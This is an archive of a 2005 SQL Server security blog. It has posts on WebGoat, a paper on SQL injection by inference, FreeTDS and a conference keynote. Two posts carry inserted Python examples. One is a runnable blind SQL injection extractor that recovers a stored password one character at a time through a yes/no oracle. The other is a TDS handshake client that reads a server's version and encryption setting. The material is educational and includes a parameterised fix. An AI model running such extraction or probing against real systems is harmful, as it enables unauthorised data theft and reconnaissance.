Pete Finnigan's SQL Server Security Blog

October 2005

Monday, October 10th

WebGoat an excellent application for testing web security


Few people have open access to full-blown web-based business applications on which they can practise all manner of web-based attacks. The Open Web Application Security Project (OWASP) has created a full J2EE web application called WebGoat that is aimed at letting people practise various attack vectors while giving online lessons on how to perform the attacks. The tool includes lessons on Cross-Site Scripting, SQL injection, blind SQL injection, weak session identifiers and many more. This is a great tool for those wishing to learn about web application security.
Pete on 10.10.05 @ 10:42 PM GMT [link]


David Litchfield has a good paper on SQL Injection methods


David Litchfield has a good new paper out titled "Data-Mining With SQL Injection and Inference", which covers methods for extracting data from a database when it is not possible to get the data back through the same channel as the original query, or even via a separate channel such as email. The method David discusses is called inference, and the paper illustrates it with SQL injection examples against SQL Server. It shows how the presence or value of data in the database can be inferred by altering known output, by provoking a web server error, or by injecting a time delay into the application. This is a very interesting paper and well worth reading.
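As an added worked example (not code from Litchfield's paper or from this post): the vulnerable lookup below concatenates input into its query and leaks only whether a product page rendered; `infer_string` turns that single bit into a full string extraction by binary-searching each character code, and `safe_lookup` is the parameterised form that the same payload cannot subvert. SQLite stands in for SQL Server so the example runs offline; the schema, data and the names `make_db`, `oracle`, `infer_string` and `QUERY_LOG` are constructed for this example, and the comments give the SQL Server equivalents (`ASCII(SUBSTRING(...))`, `WAITFOR DELAY`) of the SQLite functions used.

```python
import sqlite3

QUERY_LOG = []  # every SQL statement the "attacker" caused to run, for inspection


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and data (not from the paper or the blog post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "anvil"), (2, "bucket")])
    conn.execute("INSERT INTO users VALUES ('sa', 'Secr3t!')")
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, product_id: str) -> bool:
    """The application as the attacker sees it: untrusted input is concatenated into
    the query, and the only observable result is whether a product row came back."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    QUERY_LOG.append(sql)
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn: sqlite3.Connection, product_id: str) -> bool:
    """Hardened form: the value is bound as a parameter and is never parsed as SQL,
    so an injected condition is just a non-matching value."""
    row = conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()
    return row is not None


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """One yes/no question. The payload '1 AND (<condition>)' makes product 1 appear
    only when the condition holds, so page-present/page-absent is the inference channel.
    On SQL Server the same channel can instead be built from a forced conversion
    error, or from IF (<condition>) WAITFOR DELAY '0:0:5' measured as response time."""
    return vulnerable_lookup(conn, f"1 AND ({condition})")


def infer_string(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the result of an arbitrary scalar subquery one character at a time,
    binary-searching each 7-bit character code with exactly seven yes/no questions.
    SQLite: unicode(substr(x, pos, 1));  SQL Server: ASCII(SUBSTRING(x, pos, 1))."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end gives '' -> NULL code -> every test is false
            break
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(infer_string(db, "SELECT password FROM users WHERE name = 'sa'"))
    print(len(QUERY_LOG), "requests")
    print(safe_lookup(db, "1 AND (1=1)"))
```

The binary search keeps the cost at seven requests per character (plus seven to detect the end of the string) rather than one request per candidate value, which is what makes inference practical over a slow channel such as a timing delay. The same `oracle` shape works unchanged against a length query, a row count or any other scalar the attacker wants to know.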
Pete on 10.10.05 @ 10:26 PM GMT [link]


Thursday, October 6th

FreeTDS an implementation of SQL Server and Sybase TDS protocol libraries


I was searching for interesting SQL Server security stuff to look at and found out that the network protocol is called TDS (Tabular Data Stream) - well, actually I knew that already. I wanted to know if there are any documents available that divulge the protocol and any free libraries. If they exist then it is first possible to build your own client and second possible to send arbitrary commands to the SQL Server port, i.e. it could be hacked.

There is a great site called "FreeTDS - Making the leap to SQL Server". This details the APIs available for Perl and PHP. There is also a link to a Java implementation, and of course C libraries are available. Many different flavours of the protocol are supported. There are even versions for Unix, so it is possible to access data from SQL Server on Unix/Linux machines and even to port SQL Server code to Unix.

There is a FAQ, a user guide and a reference manual. I have not delved deeply into this yet but it certainly looks like a promising way to create a tool that can find and interrogate SQL Server, great for writing security tools and great for security research.
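As an added example (not code from the FreeTDS project or from this post) of what "build your own client" means at the byte level, assuming the TDS packet header and PRELOGIN option layout as given in the public TDS specification: the functions below frame the PRELOGIN handshake packet a client sends first, parse the reply a server sends back (from which the server version and encryption setting can be read), and bounds-check every offset in it so a malformed reply cannot index outside the buffer. The function and constant names, the made-up client version and the constructed `SAMPLE_SERVER_REPLY` are this example's own.

```python
import socket
import struct

# TDS framing and PRELOGIN layout below are taken from the published TDS
# specification; they are this example's assumptions, not something the post states.
TDS_PRELOGIN = 0x12        # client -> server handshake packet type
TDS_TABULAR_RESULT = 0x04  # server -> client packet type (carries the PRELOGIN reply)
STATUS_EOM = 0x01          # end-of-message: this packet completes the message
HEADER_LEN = 8

# PRELOGIN option tokens, and the values the ENCRYPTION option can carry
OPT_VERSION, OPT_ENCRYPTION, OPT_INSTOPT, OPT_THREADID, OPT_MARS = 0, 1, 2, 3, 4
OPT_TERMINATOR = 0xFF
ENCRYPT_OFF, ENCRYPT_ON, ENCRYPT_NOT_SUP, ENCRYPT_REQ = 0, 1, 2, 3


def tds_packet(ptype: int, payload: bytes, spid: int = 0, packet_id: int = 1) -> bytes:
    """Wrap a payload in the 8-byte TDS header: type, status, total length
    (big-endian, header included), SPID, packet id, window."""
    header = struct.pack(">BBHHBB", ptype, STATUS_EOM, HEADER_LEN + len(payload), spid, packet_id, 0)
    return header + payload


def prelogin_payload(options) -> bytes:
    """Serialise [(token, blob), ...] as the option table of (token, offset, length)
    entries terminated by 0xFF, followed by the blobs; offsets count from payload start."""
    table_len = 5 * len(options) + 1
    table, data = b"", b""
    for token, blob in options:
        table += struct.pack(">BHH", token, table_len + len(data), len(blob))
        data += blob
    return table + bytes([OPT_TERMINATOR]) + data


def build_prelogin(encryption: int = ENCRYPT_NOT_SUP, instance: bytes = b"MSSQLServer",
                   thread_id: int = 0x1234) -> bytes:
    """Client PRELOGIN: advertise a version, say whether we can do TLS, name the instance."""
    return tds_packet(TDS_PRELOGIN, prelogin_payload([
        (OPT_VERSION, struct.pack(">BBHH", 9, 0, 1399, 0)),  # made-up client version 9.0.1399.0
        (OPT_ENCRYPTION, bytes([encryption])),
        (OPT_INSTOPT, instance + b"\x00"),                   # null-terminated instance name
        (OPT_THREADID, struct.pack("<I", thread_id)),
        (OPT_MARS, b"\x00"),
    ]))


def parse_tds(packet: bytes):
    """Split header from payload; reject truncated or over-long packets."""
    if len(packet) < HEADER_LEN:
        raise ValueError("short TDS packet")
    ptype, status, length, _spid, _pid, _window = struct.unpack(">BBHHBB", packet[:HEADER_LEN])
    if length != len(packet):
        raise ValueError(f"header says {length} bytes, got {len(packet)}")
    return ptype, status, packet[HEADER_LEN:]


def parse_prelogin(payload: bytes) -> dict:
    """Decode the option table into {token: blob}, bounds-checking every entry."""
    options, i = {}, 0
    while True:
        if i >= len(payload):
            raise ValueError("PRELOGIN option table has no terminator")
        if payload[i] == OPT_TERMINATOR:
            return options
        if i + 5 > len(payload):
            raise ValueError("truncated PRELOGIN option entry")
        token, offset, length = struct.unpack(">BHH", payload[i:i + 5])
        if offset + length > len(payload):
            raise ValueError(f"option {token} points outside the payload")
        options[token] = payload[offset:offset + length]
        i += 5


def decode_version(blob: bytes) -> str:
    major, minor, build, subbuild = struct.unpack(">BBHH", blob)
    return f"{major}.{minor}.{build}.{subbuild}"


def prelogin_handshake(host: str, port: int = 1433, timeout: float = 5.0) -> dict:
    """Send PRELOGIN over TCP and return the server's decoded options (network use;
    a single recv suffices for the small reply)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_prelogin())
        reply = s.recv(4096)
    ptype, _status, payload = parse_tds(reply)
    if ptype != TDS_TABULAR_RESULT:
        raise ValueError(f"unexpected packet type 0x{ptype:02x}")
    return parse_prelogin(payload)


# Constructed server reply (not a real capture) so the parser can be exercised offline
SAMPLE_SERVER_REPLY = tds_packet(TDS_TABULAR_RESULT, prelogin_payload([
    (OPT_VERSION, struct.pack(">BBHH", 9, 0, 1399, 0)),
    (OPT_ENCRYPTION, bytes([ENCRYPT_OFF])),
    (OPT_INSTOPT, b"\x00"),
    (OPT_THREADID, b""),
    (OPT_MARS, b"\x00"),
]))

if __name__ == "__main__":
    print(build_prelogin().hex())
    opts = parse_prelogin(parse_tds(SAMPLE_SERVER_REPLY)[2])
    print("server version", decode_version(opts[OPT_VERSION]), "encryption", opts[OPT_ENCRYPTION][0])
```

Two things to notice: the handshake alone reveals the server's exact version and whether it will accept an unencrypted login, which is the "find and interrogate" step of a scanner, and the offsets in the option table are attacker-controlled data on whichever side is parsing, so a client that talks to arbitrary hosts needs the bounds checks as much as a server does.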
Pete on 10.06.05 @ 10:06 PM GMT [link]


Saturday, October 1st

Dave Campbell Keynote at SQL PASS


I came across Don Kiely's post to his blog called "Dave Campbell Keynote at SQL PASS", which covers David Campbell's keynote at SQL PASS about moving to SQL Server 2005; one of the key things he focussed on was the trusted platform and security features. Don summarises the keynote; I noted the on-stage live demo of upgrading to 2005, and Don's comment asking what security state that would leave the database in was quite good. The last paragraph is the mention of security features: the keynote included a demo of using a smart card as an encryption key, which can allow per-user encryption of data. I am not convinced as to how useful that would be in real applications. How segregated would the data need to be so that each user could only encrypt/decrypt their own data? Don also goes on to talk about some of the issues with smart card key storage.
Pete on 10.01.05 @ 10:30 PM GMT [link]